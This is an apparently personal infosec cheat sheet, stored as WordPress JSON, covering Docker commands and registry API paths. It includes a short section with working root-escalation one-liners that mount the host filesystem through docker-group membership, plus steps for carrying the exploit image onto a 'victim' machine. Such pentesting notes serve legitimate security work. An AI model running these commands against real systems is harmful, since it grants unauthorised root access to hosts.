{"id":925,"date":"2020-03-18T22:27:40","date_gmt":"2020-03-18T21:27:40","guid":{"rendered":"https:\/\/andreas-klingler.de\/infosec\/?p=925"},"modified":"2023-12-20T19:44:18","modified_gmt":"2023-12-20T18:44:18","slug":"docker","status":"publish","type":"post","link":"https:\/\/infosec.andreas-klingler.de\/?p=925","title":{"rendered":"Docker"},"content":{"rendered":"\n<h1 class=\"wp-block-heading\">General commands<\/h1>\n\n\n\n<p class=\"wp-block-paragraph\">Show avail\u00adable Dock\u00ader images<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">docker images<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Show run\u00adning Dock\u00ader instances<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">docker ps<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Run an instance in fore\u00adground (debug logs are visible)<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">docker run -p 8080:80\/tcp --name bolt11 aerth\/boltcms:latest<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Run an instance in the background<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">docker run -p 8000 --name &lt;name&gt; -d -t &lt;imagename&gt;<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Open shell into an instance<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">docker exec -it &lt;container_name&gt; \/bin\/bash<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Copy file(s)<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">docker cp $container:\/from_container\/file \/tmp\/<\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">Docker registry<\/h1>\n\n\n\n<p class=\"wp-block-paragraph\">A Dock\u00ader Reg\u00adistry is a ser\u00advice which man\u00adages con\u00adtain\u00aders. (<a href=\"https:\/\/docs.docker.com\/registry\/deploying\/\">Doku\u00admen\u00adta\u00adtion<\/a>)<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Interesting registry path<\/h2>\n\n\n\n<pre class=\"wp-block-preformatted\">GET \/v2\/\nGET \/v2\/&lt;name&gt;\/\nGET \/v2\/library\/&lt;name&gt;\/\nGET \/v2\/&lt;name&gt;\/manifests\/&lt;reference&gt;\nGET \/v2\/&lt;name&gt;\/blobs\/&lt;digest&gt;\nGET \/v2\/&lt;name&gt;\/blobs\/uploads\/&lt;uuid&gt;\nGET \/v2\/_catalog\nGET \/v2\/&lt;name&gt;\/tags\/list<\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">Docker user exploit<\/h1>\n\n\n\n<p class=\"wp-block-paragraph\">The securiy mod\u00adel of Dock\u00ader requires that only trust\u00adwor\u00adthy users are in the Dock\u00ader group. If you con\u00adtrol a user with Dock\u00ader group mem\u00adber\u00adship, you can get a root shell with the fol\u00adlow\u00ading way (<a href=\"https:\/\/fosterelli.co\/privilege-escalation-via-docker\">Source<\/a>):<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">docker run -v \/:\/hostOS -i -t chrisfosterelli\/rootplease<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><strong><span class=\"caps\">OR<\/span><\/strong> list all dock\u00ader con\u00adtain\u00aders with dock\u00ader image ls and just use one of&nbsp;them:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\"><code><a href=\"https:\/\/naturtrunken.de\/p151\/networks\/4\/targets\/103#\">docker&nbsp;run&nbsp;-v&nbsp;\/:\/mnt&nbsp;--rm&nbsp;-it&nbsp;redmine&nbsp;chroot&nbsp;\/mnt&nbsp;sh<\/a><\/code><\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">Copy docker images<\/h1>\n\n\n\n<p class=\"wp-block-paragraph\">If the vic\u00adtim does\u00adn\u2019t has Inter\u00adnet access (e.g. for the exploit above), then copy the images.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Down\u00adload the image locally:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">docker pull chrisfosterelli\/rootplease<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Pack it into a <span class=\"caps\">TAR<\/span>&nbsp;file:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">docker save -o \/tmp\/pleaseroot.tar chrisfosterelli\/rootplease<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Upload it to the vic\u00adtim. There, load&nbsp;it:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">docker load -i pleaseroot.tar<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Now the image can be&nbsp;used.<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">Escape<\/h1>\n\n\n\n<ul class=\"wp-block-list\"><li>See <a href=\"https:\/\/book.hacktricks.xyz\/linux-unix\/privilege-escalation\/docker-breakout\">Dock\u00ader Break\u00adout<\/a>.<\/li><li>See <a href=\"https:\/\/github.com\/PercussiveElbow\/docker-escape-tool\">dock\u00ader-escape-tool<\/a><\/li><\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<h1 class=\"wp-block-heading\">Notes<\/h1>\n\n\n\n<p class=\"wp-block-paragraph\">Check if \/v2\/_catalog or \/v2\/&lt;name&gt;\/tags\/list ist available.<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">Links<\/h1>\n\n\n\n<ul class=\"wp-block-list\"><li>https:\/\/www.notsosecure.com\/anatomy-of-a-hack-docker-registry\/\n<ul>\n<li><a href=\"https:\/\/github.com\/NotSoSecure\/docker_fetch\/\">https:\/\/github.com\/NotSoSecure\/docker_fetch\/<\/a> (Util\u00adi\u00adty to down\u00adload dock\u00ader images)<\/li>\n<\/ul>\n<\/li><\/ul>\n","protected":false},"excerpt":{"rendered":"<p>Gen\u00ader\u00adal com\u00admands Show avail\u00adable Dock\u00ader images dock\u00ader images Show run\u00adning Dock\u00ader instances dock\u00ader ps Run an instance in fore\u00adground (debug logs are vis\u00adi\u00adble) dock\u00ader run \u2011p 8080:80\/tcp \u2013name bolt11 aerth\/boltcms:latest Run an instance in the back\u00adground dock\u00ader run \u2011p 8000 \u2013name &lt;name&gt; \u2011d \u2011t &lt;ima\u00adge\u00adname&gt; Open shell into an instance dock\u00ader exec \u2011it &lt;container_name&gt; \/bin\/bash [\u2026]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"wp_typography_post_enhancements_disabled":false,"footnotes":""},"categories":[468],"tags":[223,220,213],"class_list":["post-925","post","type-post","status-publish","format-standard","hentry","category-general","tag-container","tag-docker","tag-registry"],"_links":{"self":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/925","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=925"}],"version-history":[{"count":13,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/925\/revisions"}],"predecessor-version":[{"id":3529,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/925\/revisions\/3529"}],"wp:attachment":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=925"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=925"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=925"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}